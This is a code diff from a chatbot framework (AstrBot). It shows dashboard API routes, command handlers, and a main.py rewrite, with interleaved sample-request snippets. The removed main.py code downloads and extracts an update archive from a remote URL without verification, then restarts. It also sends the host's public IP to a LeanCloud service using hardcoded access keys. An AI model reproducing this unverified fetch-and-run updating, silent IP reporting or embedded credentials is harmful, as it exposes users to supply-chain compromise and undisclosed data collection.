message="更新成功,机器人将在 3 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
logger.error(f"/api/update_project: {traceback.format_exc()}")
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm/list")
|
||||
def llm_list():
|
||||
ret = []
|
||||
for llm in self.context.llms:
|
||||
ret.append(llm.llm_name)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm")
|
||||
def llm():
|
||||
text = request.args["text"]
|
||||
llm = request.args["llm"]
|
||||
for llm_ in self.context.llms:
|
||||
if llm_.llm_name == llm:
|
||||
try:
|
||||
ret = asyncio.run_coroutine_threadsafe(
|
||||
llm_.llm_instance.text_chat(text), self.loop).result()
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
return Response(
|
||||
status="error",
|
||||
message="LLM not found.",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
def save_astrbot_configs(self, post_configs: dict):
|
||||
try:
|
||||
self.dashboard_helper.save_astrbot_config(post_configs)
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(3, self.context), daemon=True).start()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
def save_extension_configs(self, post_configs: dict):
|
||||
try:
|
||||
self.dashboard_helper.save_extension_config(post_configs)
|
||||
threading.Thread(target=self.astrbot_updator._reboot, args=(3, self.context), daemon=True).start()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
def _get_astrbot_config(self):
|
||||
config = self.context.config_helper.to_dict()
|
||||
for key in self.dashboard_helper.config_key_dont_show:
|
||||
if key in config:
|
||||
del config[key]
|
||||
return {
|
||||
"metadata": CONFIG_METADATA_2,
|
||||
"config": config,
|
||||
}
|
||||
|
||||
def _get_extension_config(self, namespace: str):
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
return []
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
return [{
|
||||
"config_type": "group",
|
||||
"name": namespace + " 插件配置",
|
||||
"description": "",
|
||||
"body": list(json.load(f).values())
|
||||
},]
|
||||
|
||||
async def get_log_history(self):
|
||||
try:
|
||||
with open("logs/astrbot/astrbot.log", "r", encoding="utf-8") as f:
|
||||
return f.readlines()[-100:]
|
||||
except Exception as e:
|
||||
logger.warning(f"读取日志历史失败: {e.__str__()}")
|
||||
return []
|
||||
|
||||
async def __handle_msg(self, websocket, path):
|
||||
address = websocket.remote_address
|
||||
self.ws_clients[address] = websocket
|
||||
data = await self.get_log_history()
|
||||
data = ''.join(data).replace('\n', '\r\n')
|
||||
await websocket.send(data)
|
||||
while True:
|
||||
try:
|
||||
msg = await websocket.recv()
|
||||
except websockets.exceptions.ConnectionClosedError:
|
||||
# logger.info(f"和 {address} 的 websocket 连接已断开")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
except Exception as e:
|
||||
# logger.info(f"和 {path} 的 websocket 连接发生了错误: {e.__str__()}")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
|
||||
async def ws_server(self):
|
||||
ws_server = websockets.serve(self.__handle_msg, "0.0.0.0", 6186)
|
||||
logger.info("WebSocket 服务器已启动。")
|
||||
await ws_server
|
||||
|
||||
def http_server(self):
|
||||
http_server = make_server(
|
||||
'0.0.0.0', 6185, self.dashboard_be, threaded=True)
|
||||
http_server.serve_forever()
|
||||
|
||||
def run_http_server(self):
|
||||
self.http_server_thread = threading.Thread(target=self.http_server, daemon=True).start()
|
||||
ip_address = get_local_ip_addresses()
|
||||
ip_str = f"http://{ip_address}:6185"
|
||||
logger.info(f"HTTP 服务器已启动,可访问: {ip_str} 等来登录可视化面板。")
|
||||
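A quick way to exercise the routes above once the dashboard is running. The port (6185) and endpoint paths come from this file; the credentials are illustrative and must match whatever is stored in config_helper.dashboard:

import requests

BASE = "http://127.0.0.1:6185"  # make_server() above binds 0.0.0.0:6185

# /api/authenticate compares the posted username/password against the
# dashboard section of the config and returns a token on success.
login = requests.post(f"{BASE}/api/authenticate",
                      json={"username": "astrbot", "password": "astrbot"}).json()
print(login["status"], login["message"])

# /api/stats returns the aggregated session/message/platform counters.
print(requests.get(f"{BASE}/api/stats").json()["data"])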
209
main.py
@@ -1,168 +1,63 @@
|
||||
import threading
|
||||
import time
|
||||
|
||||
import os
|
||||
import asyncio
|
||||
import os, sys
|
||||
import signal
|
||||
import requests,json
|
||||
import sys
|
||||
import warnings
|
||||
import traceback
|
||||
import mimetypes
|
||||
from astrbot.bootstrap import AstrBotBootstrap
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Formatter
|
||||
|
||||
# 是否是windows打包。一般人不需要改这个,这个只是我为了方便加上的。
|
||||
win_compile_mode = False
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
|
||||
|
||||
def main(loop, event):
|
||||
import cores.qqbot.core as qqBot
|
||||
from cores.openai.core import ChatGPT
|
||||
#实例化ChatGPT
|
||||
chatgpt = ChatGPT()
|
||||
# #执行qqBot
|
||||
qqBot.initBot(chatgpt)
|
||||
|
||||
# 仅支持linux
|
||||
def hot_update(ver):
|
||||
target = 'target.tar'
|
||||
time.sleep(5)
|
||||
while(True):
|
||||
if os.path.exists('version.txt'):
|
||||
version_file = open('version.txt', 'r', encoding='utf-8')
|
||||
vs = version_file.read()
|
||||
version = float(vs)
|
||||
else:
|
||||
version = 0
|
||||
if not os.path.exists(target):
|
||||
version = 0
|
||||
try:
|
||||
res = requests.get("https://soulter.top/channelbot/update.json")
|
||||
res_obj = json.loads(res.text)
|
||||
ol_version = float(res_obj['version'])
|
||||
if ol_version > version:
|
||||
print('发现新版本: ' + str(ol_version))
|
||||
res = requests.get(res_obj['linux-url'], stream=True)
|
||||
filesize = res.headers["Content-Length"]
|
||||
print('文件大小: ' + str(int(filesize) / 1024 / 1024) + 'MB')
|
||||
print('正在更新文件...')
|
||||
chunk_size = 1024
|
||||
times = int(filesize) // chunk_size
|
||||
show = 1 / times
|
||||
show2 = 1 / times
|
||||
start = 1
|
||||
with open(target, "wb") as pyFile:
|
||||
for chunk in res.iter_content(chunk_size=chunk_size):
|
||||
if chunk:
|
||||
pyFile.write(chunk)
|
||||
if start <= times:
|
||||
print(f"\r下载进度: {show:.2%}",end="",flush=True)
|
||||
start += 1
|
||||
show += show2
|
||||
else:
|
||||
sys.stdout.write(f"下载进度: 100%\n")
|
||||
print('更新完成')
|
||||
print('解压覆盖')
|
||||
os.system(f"tar -zxvf {target}")
|
||||
version = ol_version
|
||||
version_file = open('version.txt', 'w+', encoding='utf-8')
|
||||
version_file.write(str(res_obj['version']))
|
||||
version_file.flush()
|
||||
version_file.close()
|
||||
|
||||
try:
|
||||
update_version(version)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
|
||||
print('自启动')
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
time.sleep(60*20)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
print("upd出现异常,请联系QQ905617992")
|
||||
time.sleep(60*20)
|
||||
|
||||
|
||||
def update_version(ver):
|
||||
if not os.path.exists('update_record'):
|
||||
object_id = ''
|
||||
else:
|
||||
object_id = open("update_record", 'r', encoding='utf-8').read()
|
||||
addr = 'unknown'
|
||||
warnings.filterwarnings("ignore")
|
||||
logo_tmpl = r"""
|
||||
___ _______.___________..______ .______ ______ .___________.
|
||||
/ \ / | || _ \ | _ \ / __ \ | |
|
||||
/ ^ \ | (----`---| |----`| |_) | | |_) | | | | | `---| |----`
|
||||
/ /_\ \ \ \ | | | / | _ < | | | | | |
|
||||
/ _____ \ .----) | | | | |\ \----.| |_) | | `--' | | |
|
||||
/__/ \__\ |_______/ |__| | _| `._____||______/ \______/ |__|
|
||||
|
||||
"""
|
||||
|
||||
def main():
|
||||
global logger
|
||||
try:
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
# md = hashlib.md5((ts+'QAZ1rQLY1ZufHrZlpuUiNff7').encode())
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
d = {"data": {'version':'win-hot-update'+str(ver), 'addr': addr}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open("update_record", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
import botpy, logging
|
||||
# delete qqbotpy's logger
|
||||
for handler in logging.root.handlers[:]:
|
||||
logging.root.removeHandler(handler)
|
||||
|
||||
logger.info(logo_tmpl)
|
||||
|
||||
bootstrap = AstrBotBootstrap()
|
||||
asyncio.run(bootstrap.run())
|
||||
except KeyboardInterrupt:
|
||||
logger.info("AstrBot 已退出。")
|
||||
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
logger.error(traceback.format_exc())
|
||||
|
||||
def check_env():
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
|
||||
print("请使用Python3.8运行本项目")
|
||||
input("按任意键退出...")
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 9):
|
||||
logger.error("请使用 Python3.9+ 运行本项目。")
|
||||
exit()
|
||||
try:
|
||||
import openai
|
||||
import botpy
|
||||
import yaml
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
try:
|
||||
print("安装依赖库中...")
|
||||
os.system("pip3 install openai")
|
||||
os.system("pip3 install qq-botpy")
|
||||
os.system("pip3 install pyyaml")
|
||||
print("安装依赖库完毕...")
|
||||
except BaseException:
|
||||
print("\n安装第三方库异常.请自行安装或者联系QQ905617992.")
|
||||
|
||||
# 检查key
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
import yaml
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
if cfg['openai']['key'] == '' or cfg['openai']['key'] == None:
|
||||
print("请先在configs/config.yaml下添加一个可用的OpenAI Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
if cfg['qqbot']['appid'] == '' or cfg['qqbot']['token'] == '' or cfg['qqbot']['appid'] == None or cfg['qqbot']['token'] == None:
|
||||
print("请先在configs/config.yaml下完善appid和token令牌(在https://q.qq.com/上注册一个QQ机器人即可获得)")
|
||||
|
||||
def get_platform():
|
||||
import platform
|
||||
sys_platform = platform.platform().lower()
|
||||
if "windows" in sys_platform:
|
||||
return "win"
|
||||
elif "macos" in sys_platform:
|
||||
return "mac"
|
||||
elif "linux" in sys_platform:
|
||||
return "linux"
|
||||
else:
|
||||
print("other")
|
||||
os.makedirs("data/config", exist_ok=True)
|
||||
os.makedirs("data/plugins", exist_ok=True)
|
||||
os.makedirs("data/temp", exist_ok=True)
|
||||
|
||||
# workaround for issue #181
|
||||
mimetypes.add_type("text/javascript", ".js")
|
||||
mimetypes.add_type("text/javascript", ".mjs")
|
||||
mimetypes.add_type("application/json", ".json")
|
||||
|
||||
if __name__ == "__main__":
|
||||
global pid
|
||||
pid = os.getpid()
|
||||
global ma_type
|
||||
print("程序PID:"+str(pid))
|
||||
check_env()
|
||||
bot_event = threading.Event()
|
||||
loop = asyncio.get_event_loop()
|
||||
ma_type = get_platform()
|
||||
if ma_type == 'linux':
|
||||
threading.Thread(target=hot_update).start()
|
||||
|
||||
main(loop, bot_event)
|
||||
|
||||
logger = LogManager.GetLogger(
|
||||
log_name='astrbot',
|
||||
out_to_console=True,
|
||||
custom_formatter=Formatter('[%(asctime)s| %(name)s - %(levelname)s|%(filename)s:%(lineno)d]: %(message)s', datefmt="%H:%M:%S")
|
||||
)
|
||||
main()
|
||||
|
||||
276
model/command/internal_handler.py
Normal file
@@ -0,0 +1,276 @@
|
||||
import aiohttp, os
|
||||
|
||||
from model.command.manager import CommandManager
|
||||
from model.plugin.manager import PluginManager
|
||||
from type.message_event import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
from type.types import Context
|
||||
from type.config import VERSION
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from util.agent.web_searcher import search_from_bing, fetch_website_content
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class InternalCommandHandler:
|
||||
def __init__(self, manager: CommandManager, plugin_manager: PluginManager) -> None:
|
||||
self.manager = manager
|
||||
self.plugin_manager = plugin_manager
|
||||
|
||||
self.manager.register("help", "查看帮助", 10, self.help)
|
||||
self.manager.register("wake", "唤醒前缀", 10, self.set_nick)
|
||||
self.manager.register("update", "更新管理", 10, self.update)
|
||||
self.manager.register("plugin", "插件管理", 10, self.plugin)
|
||||
self.manager.register("reboot", "重启 AstrBot", 10, self.reboot)
|
||||
self.manager.register("websearch", "网页搜索", 10, self.web_search)
|
||||
self.manager.register("t2i", "文转图", 10, self.t2i_toggle)
|
||||
self.manager.register("myid", "用户ID", 10, self.myid)
|
||||
self.manager.register("provider", "LLM 接入源", 10, self.provider)
|
||||
|
||||
def _check_auth(self, message: AstrMessageEvent, context: Context):
|
||||
if os.environ.get("TEST_MODE", "off") == "on":
|
||||
return
|
||||
if message.role != "admin":
|
||||
user_id = message.message_obj.sender.user_id
|
||||
raise Exception(f"用户(ID: {user_id}) 没有足够的权限使用该指令。")
|
||||
|
||||
def provider(self, message: AstrMessageEvent, context: Context):
|
||||
if len(context.llms) == 0:
|
||||
return CommandResult().message("当前没有加载任何 LLM 接入源。")
|
||||
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
|
||||
if tokens.len == 1:
|
||||
ret = "## 当前载入的 LLM 接入源\n"
|
||||
for idx, llm in enumerate(context.llms):
|
||||
ret += f"{idx}. {llm.llm_name}"
|
||||
if llm.origin:
|
||||
ret += f" (来源: {llm.origin})"
|
||||
if context.message_handler.provider == llm.llm_instance:
|
||||
ret += " (当前使用)"
|
||||
ret += "\n"
|
||||
|
||||
ret += "\n使用 provider <序号> 切换 LLM 接入源。"
|
||||
return CommandResult().message(ret)
|
||||
else:
|
||||
try:
|
||||
idx = int(tokens.get(1))
|
||||
if idx >= len(context.llms):
|
||||
return CommandResult().message("provider: 无效的序号。")
|
||||
context.message_handler.set_provider(context.llms[idx].llm_instance)
|
||||
return CommandResult().message(f"已经成功切换到 LLM 接入源 {context.llms[idx].llm_name}。")
|
||||
except BaseException as e:
|
||||
return CommandResult().message("provider: 参数错误。")
|
||||
|
||||
def set_nick(self, message: AstrMessageEvent, context: Context):
|
||||
self._check_auth(message, context)
|
||||
message_str = message.message_str
|
||||
l = message_str.split(" ")
|
||||
if len(l) == 1:
|
||||
return CommandResult().message(f"设置机器人唤醒词。以唤醒词开头的消息会唤醒机器人处理,起到 @ 的效果。\n示例:wake 昵称。当前唤醒词是:{context.config_helper.wake_prefix[0]}")
|
||||
nick = l[1].strip()
|
||||
if not nick:
|
||||
return CommandResult().message("wake: 请指定唤醒词。")
|
||||
context.config_helper.wake_prefix = [nick]
|
||||
context.config_helper.save_config()
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=f"已经成功将唤醒前缀设定为 {nick}。",
|
||||
)
|
||||
|
||||
async def update(self, message: AstrMessageEvent, context: Context):
|
||||
self._check_auth(message, context)
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
update_info = await context.updator.check_update(None, None)
|
||||
if tokens.len == 1:
|
||||
ret = ""
|
||||
if not update_info:
|
||||
ret = f"当前已经是最新版本 v{VERSION}。"
|
||||
else:
|
||||
ret = f"发现新版本 {update_info.version},更新内容如下:\n---\n{update_info.body}\n---\n- 使用 /update latest 更新到最新版本。\n- 使用 /update vX.X.X 更新到指定版本。"
|
||||
return CommandResult().message(ret)
|
||||
else:
|
||||
if tokens.get(1) == "latest":
|
||||
try:
|
||||
await context.updator.update()
|
||||
return CommandResult().message(f"已经成功更新到最新版本 v{update_info.version}。要应用更新,请重启 AstrBot。输入 /reboot 即可重启")
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"更新失败。原因:{str(e)}")
|
||||
elif tokens.get(1).startswith("v"):
|
||||
try:
|
||||
await context.updator.update(version=tokens.get(1))
|
||||
return CommandResult().message(f"已经成功更新到版本 v{tokens.get(1)}。要应用更新,请重启 AstrBot。输入 /reboot 即可重启")
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"更新失败。原因:{str(e)}")
|
||||
else:
|
||||
return CommandResult().message("update: 参数错误。")
|
||||
|
||||
def reboot(self, message: AstrMessageEvent, context: Context):
|
||||
self._check_auth(message, context)
|
||||
context.updator._reboot(3, context)
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="AstrBot 将在 3s 后重启。",
|
||||
)
|
||||
|
||||
async def plugin(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
ret = "# 插件指令面板 \n- 安装插件: `plugin i 插件Github地址`\n- 卸载插件: `plugin d 插件名`\n- 查看插件列表:`plugin l`\n - 更新插件: `plugin u 插件名`\n"
|
||||
return CommandResult().message(ret)
|
||||
|
||||
if tokens.get(1) == "l":
|
||||
plugin_list_info = ""
|
||||
for plugin in context.cached_plugins:
|
||||
plugin_list_info += f"- `{plugin.metadata.plugin_name}` By {plugin.metadata.author}: {plugin.metadata.desc}\n"
|
||||
if plugin_list_info.strip() == "":
|
||||
return CommandResult().message("plugin v: 没有找到插件。")
|
||||
return CommandResult().message(plugin_list_info)
|
||||
|
||||
self._check_auth(message, context)
|
||||
|
||||
if tokens.get(1) == "d":
|
||||
if tokens.len == 2:
|
||||
return CommandResult().message("plugin d: 请指定要卸载的插件名。")
|
||||
plugin_name = tokens.get(2)
|
||||
try:
|
||||
self.plugin_manager.uninstall_plugin(plugin_name)
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"plugin d: 卸载插件失败。原因:{str(e)}")
|
||||
return CommandResult().message(f"plugin d: 已经成功卸载插件 {plugin_name}。")
|
||||
|
||||
elif tokens.get(1) == "i":
|
||||
if tokens.len == 2:
|
||||
return CommandResult().message("plugin i: 请指定要安装的插件的 Github 地址,或者前往可视化面板安装。")
|
||||
plugin_url = tokens.get(2)
|
||||
try:
|
||||
await self.plugin_manager.install_plugin(plugin_url)
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"plugin i: 安装插件失败。原因:{str(e)}")
|
||||
return CommandResult().message("plugin i: 已经成功安装插件。")
|
||||
|
||||
elif tokens.get(1) == "u":
|
||||
if tokens.len == 2:
|
||||
return CommandResult().message("plugin u: 请指定要更新的插件名。")
|
||||
plugin_name = tokens.get(2)
|
||||
try:
|
||||
await context.plugin_updator.update(plugin_name)
|
||||
except BaseException as e:
|
||||
return CommandResult().message(f"plugin u: 更新插件失败。原因:{str(e)}")
|
||||
return CommandResult().message(f"plugin u: 已经成功更新插件 {plugin_name}。")
|
||||
|
||||
return CommandResult().message("plugin: 参数错误。")
|
||||
|
||||
async def help(self, message: AstrMessageEvent, context: Context):
|
||||
notice = ""
|
||||
try:
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get("https://soulter.top/channelbot/notice.json") as resp:
|
||||
notice = (await resp.json())["notice"]
|
||||
except BaseException as e:
|
||||
logger.warning("An error occurred while fetching astrbot notice. Never mind, it's not important.")
|
||||
|
||||
msg = "# 帮助中心\n## 指令\n"
|
||||
for key, value in self.manager.commands_handler.items():
|
||||
if value.plugin_metadata:
|
||||
msg += f"- `{key}` ({value.plugin_metadata.plugin_name}): {value.description}\n"
|
||||
else: msg += f"- `{key}`: {value.description}\n"
|
||||
# plugins
|
||||
if context.cached_plugins:
|
||||
plugin_list_info = ""
|
||||
for plugin in context.cached_plugins:
|
||||
plugin_list_info += f"- `{plugin.metadata.plugin_name}` {plugin.metadata.desc}\n"
|
||||
if plugin_list_info.strip() != "":
|
||||
msg += "\n## 插件\n> 使用plugin v 插件名 查看插件帮助\n"
|
||||
msg += plugin_list_info
|
||||
msg += notice
|
||||
|
||||
return CommandResult().message(msg)
|
||||
|
||||
def web_search(self, message: AstrMessageEvent, context: Context):
|
||||
l = message.message_str.split(' ')
|
||||
if len(l) == 1:
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=f"网页搜索功能当前状态: {context.config_helper.llm_settings.web_search}",
|
||||
)
|
||||
elif l[1] == 'on':
|
||||
context.config_helper.llm_settings.web_search = True
|
||||
context.config_helper.save_config()
|
||||
context.register_llm_tool("web_search", [{
|
||||
"type": "string",
|
||||
"name": "keyword",
|
||||
"description": "搜索关键词"
|
||||
}],
|
||||
"通过搜索引擎搜索。如果问题需要获取近期、实时的消息,在网页上搜索(如天气、新闻或任何需要通过网页获取信息的问题),则调用此函数;如果没有,不要调用此函数。",
|
||||
search_from_bing
|
||||
)
|
||||
context.register_llm_tool("fetch_website_content", [{
|
||||
"type": "string",
|
||||
"name": "url",
|
||||
"description": "要获取内容的网页链接"
|
||||
}],
|
||||
"获取网页的内容。如果问题带有合法的网页链接并且用户有需求了解网页内容(例如: `帮我总结一下 https://github.com 的内容`), 就调用此函数。如果没有,不要调用此函数。",
|
||||
fetch_website_content
|
||||
)
|
||||
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已开启网页搜索",
|
||||
)
|
||||
elif l[1] == 'off':
|
||||
context.config_helper.llm_settings.web_search = False
|
||||
context.config_helper.save_config()
|
||||
context.unregister_llm_tool("web_search")
|
||||
context.unregister_llm_tool("fetch_website_content")
|
||||
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已关闭网页搜索",
|
||||
)
|
||||
else:
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=False,
|
||||
message_chain="参数错误",
|
||||
)
|
||||
|
||||
def t2i_toggle(self, message: AstrMessageEvent, context: Context):
|
||||
p = context.config_helper.t2i
|
||||
if p:
|
||||
context.config_helper.t2i = False
|
||||
context.config_helper.save_config()
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已关闭文本转图片模式。",
|
||||
)
|
||||
context.config_helper.t2i = True
|
||||
context.config_helper.save_config()
|
||||
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain="已开启文本转图片模式。",
|
||||
)
|
||||
|
||||
def myid(self, message: AstrMessageEvent, context: Context):
|
||||
try:
|
||||
user_id = str(message.message_obj.sender.user_id)
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=f"你在此平台上的ID:{user_id}",
|
||||
)
|
||||
except BaseException as e:
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=False,
|
||||
message_chain=f"获取失败,原因: {str(e)}",
|
||||
)
|
||||
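All of the built-in handlers above share one shape: they take the message event and the global Context and return a CommandResult. An illustrative custom handler (not part of this commit range) would look like:

from type.message_event import AstrMessageEvent
from type.command import CommandResult
from type.types import Context

# Minimal handler: reply with a fixed message. Async handlers work the same
# way; CommandManager.execute_handler awaits coroutine functions automatically.
def ping(message: AstrMessageEvent, context: Context) -> CommandResult:
    return CommandResult().message("pong")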
145
model/command/manager.py
Normal file
@@ -0,0 +1,145 @@
|
||||
import heapq
|
||||
import inspect
|
||||
import traceback
|
||||
from typing import Dict
|
||||
from type.types import Context
|
||||
from type.plugin import PluginMetadata
|
||||
from type.message_event import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
from type.register import RegisteredPlugins
|
||||
from model.command.parser import CommandParser
|
||||
from model.plugin.command import PluginCommandBridge
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from dataclasses import dataclass
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
@dataclass
|
||||
class CommandMetadata():
|
||||
inner_command: bool
|
||||
plugin_metadata: PluginMetadata
|
||||
handler: callable
|
||||
use_regex: bool = False
|
||||
ignore_prefix: bool = False
|
||||
description: str = ""
|
||||
|
||||
class CommandManager():
|
||||
def __init__(self):
|
||||
self.commands = []
|
||||
self.commands_handler: Dict[str, CommandMetadata] = {}
|
||||
self.command_parser = CommandParser()
|
||||
|
||||
def register(self,
|
||||
command: str,
|
||||
description: str,
|
||||
priority: int,
|
||||
handler: callable,
|
||||
use_regex: bool = False,
|
||||
ignore_prefix: bool = False,
|
||||
plugin_metadata: PluginMetadata = None,
|
||||
):
|
||||
'''
|
||||
优先级越高,越先被处理。
|
||||
|
||||
use_regex: 是否使用正则表达式匹配指令。
|
||||
'''
|
||||
if command in self.commands_handler:
|
||||
raise ValueError(f"Command {command} already exists.")
|
||||
if not handler:
|
||||
raise ValueError(f"Handler of {command} is None.")
|
||||
|
||||
heapq.heappush(self.commands, (-priority, command))
|
||||
self.commands_handler[command] = CommandMetadata(
|
||||
inner_command=plugin_metadata == None,
|
||||
plugin_metadata=plugin_metadata,
|
||||
handler=handler,
|
||||
use_regex=use_regex,
|
||||
ignore_prefix=ignore_prefix,
|
||||
description=description
|
||||
)
|
||||
if plugin_metadata:
|
||||
logger.info(f"已注册 {plugin_metadata.author}/{plugin_metadata.plugin_name} 的指令 {command}。")
|
||||
else:
|
||||
logger.info(f"已注册指令 {command}。")
|
||||
|
||||
def register_from_pcb(self, pcb: PluginCommandBridge):
|
||||
for request in pcb.plugin_commands_waitlist:
|
||||
plugin = None
|
||||
for registered_plugin in pcb.cached_plugins:
|
||||
if registered_plugin.metadata.plugin_name == request.plugin_name:
|
||||
plugin = registered_plugin
|
||||
break
|
||||
if not plugin:
|
||||
logger.warning(f"插件 {request.plugin_name} 未找到,无法注册指令 {request.command_name}。")
|
||||
else:
|
||||
self.register(command=request.command_name,
|
||||
description=request.description,
|
||||
priority=request.priority,
|
||||
handler=request.handler,
|
||||
use_regex=request.use_regex,
|
||||
ignore_prefix=request.ignore_prefix,
|
||||
plugin_metadata=plugin.metadata)
|
||||
self.plugin_commands_waitlist = []
|
||||
|
||||
async def check_command_ignore_prefix(self, message_str: str) -> bool:
|
||||
for _, command in self.commands:
|
||||
command_metadata = self.commands_handler[command]
|
||||
if command_metadata.ignore_prefix:
|
||||
trig = False
|
||||
if self.commands_handler[command].use_regex:
|
||||
trig = self.command_parser.regex_match(message_str, command)
|
||||
else:
|
||||
trig = message_str.startswith(command)
|
||||
if trig:
|
||||
return True
|
||||
return False
|
||||
|
||||
async def scan_command(self, message_event: AstrMessageEvent, context: Context) -> CommandResult:
|
||||
message_str = message_event.message_str
|
||||
for _, command in self.commands:
|
||||
trig = False
|
||||
if self.commands_handler[command].use_regex:
|
||||
trig = self.command_parser.regex_match(message_str, command)
|
||||
else:
|
||||
trig = message_str.startswith(command)
|
||||
if trig:
|
||||
logger.info(f"触发 {command} 指令。")
|
||||
command_result = await self.execute_handler(command, message_event, context)
|
||||
if not command_result:
|
||||
continue
|
||||
if command_result.hit:
|
||||
return command_result
|
||||
|
||||
async def execute_handler(self,
|
||||
command: str,
|
||||
message_event: AstrMessageEvent,
|
||||
context: Context) -> CommandResult:
|
||||
command_metadata = self.commands_handler[command]
|
||||
handler = command_metadata.handler
|
||||
# call handler
|
||||
try:
|
||||
if inspect.iscoroutinefunction(handler):
|
||||
command_result = await handler(message_event, context)
|
||||
else:
|
||||
command_result = handler(message_event, context)
|
||||
|
||||
# if not isinstance(command_result, CommandResult):
|
||||
# raise ValueError(f"Command {command} handler should return CommandResult.")
|
||||
|
||||
if not command_result:
|
||||
return
|
||||
|
||||
context.metrics_uploader.command_stats[command] += 1
|
||||
|
||||
return command_result
|
||||
except BaseException as e:
|
||||
logger.error(traceback.format_exc())
|
||||
|
||||
if not command_metadata.inner_command:
|
||||
text = f"执行 {command}/({command_metadata.plugin_metadata.plugin_name} By {command_metadata.plugin_metadata.author}) 指令时发生了异常。{e}"
|
||||
logger.error(text)
|
||||
else:
|
||||
text = f"执行 {command} 指令时发生了异常。{e}"
|
||||
logger.error(text)
|
||||
return CommandResult().message(text)
|
||||
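Registration and dispatch, sketched against the API above (illustrative; priority is pushed negated onto a heap, so larger priority values are intended to be matched earlier by scan_command):

from type.command import CommandResult

def ping(message, context):
    return CommandResult().message("pong")

manager = CommandManager()
manager.register("ping", "connectivity test", 10, ping)

# Inside the message pipeline (simplified):
#   result = await manager.scan_command(message_event, context)
#   if result and result.hit:
#       ... deliver result.message_chain via the platform adapter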
186
model/command/openai_official_handler.py
Normal file
@@ -0,0 +1,186 @@
|
||||
from model.command.manager import CommandManager
|
||||
from type.message_event import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
from type.types import Context
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from nakuru.entities.components import Image
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial, MODELS
|
||||
from util.personality import personalities
|
||||
from util.io import download_image_by_url
|
||||
|
||||
